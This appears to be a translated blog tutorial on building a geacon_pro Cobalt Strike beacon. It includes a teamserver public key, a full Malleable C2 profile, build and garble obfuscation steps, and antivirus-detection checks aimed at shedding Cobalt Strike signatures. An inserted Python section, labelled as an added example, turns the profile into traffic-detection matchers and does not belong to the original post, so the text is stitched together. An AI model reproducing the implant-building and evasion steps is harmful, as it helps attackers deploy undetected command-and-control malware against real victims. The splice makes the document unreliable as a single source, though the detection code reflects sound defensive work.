A quick filler post.
Here we use the compile-to-exe approach, starting from the source code.
Configuring RsaPublicKey
The environment here is CS 4.7 with Huorong AV. Take the beacon_key from the teamserver, put it into the geacon_pro/tools/BeaconTool/out/artifacts/BeaconTool_jar directory and decrypt it.
From the result we only need to extract the public key:
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCgUinQr5wv4CQaw0pVHUb+hmc0xchaOaC4hJhc
4HVRN64MT2U2F4x+A+x2DGevp+yM1QLyQLN3sZpEpnCK8vyg2JmKGccwNak6NAg1q7Ur6ZA6nFkq
s9IhRtFw86eI3K0nRdaqRsKKDCz36YSObQEo7w0O/9qVJHeFKPe1oMJYQwIDAQAB
-----END PUBLIC KEY-----
Replace the public key in config with this one.
Then fill in the remaining fields; the C2 here is the address of your listener.
One thing to note here:
when running the teamserver, remember to pass it the profile (the configuration file).
The author provides a default profile:
# default sleep time is 60s
set sleeptime "3000";
set jitter "7";

https-certificate {
    set C "KZ";
    set CN "foren.zik";
    set O "NN Fern Sub";
    set OU "NN Fern";
    set ST "KZ";
    set validity "365";
}

# define indicators for an HTTP GET
http-get {
    set uri "/www/handle/doc";
    client {
        #header "Host" "aliyun.com";
        # base64 encode session metadata and store it in the Cookie header.
        metadata {
            base64url;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }
    server {
        # server should send output with no changes
        #header "Content-Type" "application/octet-stream";
        header "Server" "nginx/1.10.3 (Ubuntu)";
        header "Content-Type" "application/octet-stream";
        header "Connection" "keep-alive";
        header "Vary" "Accept";
        header "Pragma" "public";
        header "Expires" "0";
        header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";
        output {
            mask;
            netbios;
            prepend "data=";
            append "%%";
            print;
        }
    }
}

# define indicators for an HTTP POST
http-post {
    # Same as above, Beacon will randomly choose from this pool of URIs [if multiple URIs are provided]
    set uri "/IMXo";
    client {
        #header "Content-Type" "application/octet-stream";
        # transmit our session identifier as /submit.php?id=[identifier]
        id {
            mask;
            netbiosu;
            prepend "user=";
            append "%%";
            header "User";
        }
        # post our output with no real changes
        output {
            mask;
            base64url;
            prepend "data=";
            append "%%";
            print;
        }
    }
    # The server's response to our HTTP POST
    server {
        header "Server" "nginx/1.10.3 (Ubuntu)";
        header "Content-Type" "application/octet-stream";
        header "Connection" "keep-alive";
        header "Vary" "Accept";
        header "Pragma" "public";
        header "Expires" "0";
        header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";
        # this will just print an empty string, meh...
        output {
            mask;
            netbios;
            prepend "data=";
            append "%%";
            print;
        }
    }
}

post-ex {
    set spawnto_x86 "c:\windows\syswow64\rundll32.exe";
    set spawnto_x64 "c:\windows\system32\rundll32.exe";
    set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";
    set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##";
    set keylogger "SetWindowsHookEx";
}
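The profile above fixes the wire format that any beacon built from it will produce: the GET URI with a base64url cookie prefixed "SESSIONID=", the POST URI with a "user=...%%" header in upper-case NetBIOS encoding, the fixed "nginx/1.10.3 (Ubuntu)" banner and Cache-Control value, and "data=...%%" bodies. That is exactly what a defender can key detections on, independent of whether the binary carries Cobalt Strike signatures. The following Python is an added example, not code from this page or from the geacon pro project: it turns the profile's transform chains into matchers and runs them over constructed request/response records. The record layout, sample values and the flagging threshold are assumptions made for the illustration.

```python
import re

# Indicators copied from the Malleable C2 profile above. The traffic records
# further down are constructed for this example, not captured data.
GET_URI = "/www/handle/doc"
POST_URI = "/IMXo"
SERVER_BANNER = "nginx/1.10.3 (Ubuntu)"
CACHE_CONTROL = "must-revalidate, post-check=0, pre-check=0"

# Transform chains from the profile, expressed as regexes on the wire format:
#   metadata: base64url; prepend "SESSIONID="; header "Cookie"
COOKIE_RE = re.compile(r"^SESSIONID=[A-Za-z0-9_-]+={0,2}$")
#   id: mask; netbiosu (upper-case NetBIOS, alphabet A-P); prepend "user="; append "%%"
USER_RE = re.compile(r"^user=[A-P]+%%$")
#   post output: mask; base64url; prepend "data="; append "%%"
POST_BODY_RE = re.compile(r"^data=[A-Za-z0-9_-]+={0,2}%%$")
#   server output: mask; netbios (lower-case, alphabet a-p); prepend "data="; append "%%"
SERVER_BODY_RE = re.compile(r"^data=[a-p]+%%$")


def lower_headers(headers):
    """Header names are case-insensitive; normalise before lookup."""
    return {k.lower(): v for k, v in headers.items()}


def match_request(req):
    """Return the list of profile indicators a request record matches."""
    hits = []
    h = lower_headers(req.get("headers", {}))
    method, uri, body = req.get("method", ""), req.get("uri", ""), req.get("body", "")
    if method == "GET" and uri == GET_URI:
        hits.append("get_uri")
        if COOKIE_RE.match(h.get("cookie", "")):
            hits.append("metadata_cookie")
    if method == "POST" and uri == POST_URI:
        hits.append("post_uri")
        if USER_RE.match(h.get("user", "")):
            hits.append("id_user_header")
        if POST_BODY_RE.match(body):
            hits.append("post_output_body")
    return hits


def match_response(resp):
    """Return the list of profile indicators a response record matches."""
    hits = []
    h = lower_headers(resp.get("headers", {}))
    if h.get("server") == SERVER_BANNER:
        hits.append("server_banner")
    if h.get("cache-control") == CACHE_CONTROL:
        hits.append("cache_control")
    if SERVER_BODY_RE.match(resp.get("body", "")):
        hits.append("netbios_body")
    return hits


def score_exchange(req, resp, threshold=3):
    """Combine request and response hits. A lone banner match is common on
    legitimate nginx hosts, so several indicators are required before flagging
    (threshold is an assumption; tune it against your own baseline)."""
    hits = match_request(req) + match_response(resp)
    return {"hits": hits, "flag": len(hits) >= threshold}


# Constructed sample traffic (not real captures).
BEACON_GET = {
    "method": "GET", "uri": "/www/handle/doc",
    "headers": {"Host": "203.0.113.10", "Cookie": "SESSIONID=QUJDREVGR0hJSktMTU5PUA"},
    "body": "",
}
BEACON_RESP = {
    "headers": {"Server": "nginx/1.10.3 (Ubuntu)",
                "Cache-Control": "must-revalidate, post-check=0, pre-check=0"},
    "body": "data=abcdefghabcdefghabcd%%",
}
BEACON_POST = {
    "method": "POST", "uri": "/IMXo",
    "headers": {"User": "user=ABCDEFGHIJKLMNOP%%"},
    "body": "data=c2VjcmV0LW91dHB1dA%%",
}
BENIGN_GET = {
    "method": "GET", "uri": "/index.html",
    "headers": {"Cookie": "SESSIONID=abc123"},
    "body": "",
}
BENIGN_RESP = {"headers": {"Server": "nginx/1.10.3 (Ubuntu)"}, "body": "<html></html>"}

if __name__ == "__main__":
    for name, r, s in [("beacon GET", BEACON_GET, BEACON_RESP),
                       ("beacon POST", BEACON_POST, BEACON_RESP),
                       ("benign", BENIGN_GET, BENIGN_RESP)]:
        print(name, score_exchange(r, s))
```

The same regexes translate directly into proxy or IDS rules; the point of scoring rather than single-indicator alerting is that a changed URI or banner in a customised profile removes one hit but leaves the "data=...%%" body shape and the NetBIOS alphabet, which are much harder to vary without touching the transform chain.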
Then just run go build.
Upload it to ThreatBook (微步) to take a look:
Even though it is flagged as malicious, it has no Cobalt Strike signatures.
Here we try again with garble; the beacon checks in successfully.
Check ThreatBook again:
Not bad; fewer engines flag it now (from "workhorse" to "small workhorse", as it were).
We won't test the AV evasion any further here; the main point is that it no longer carries Cobalt Strike signatures.
After that it can be converted to shellcode and loaded with the Win32 API, the usual old way of getting a beacon online.
Originally published on the WeChat official account (老鑫安全): geacon pro usage tutorial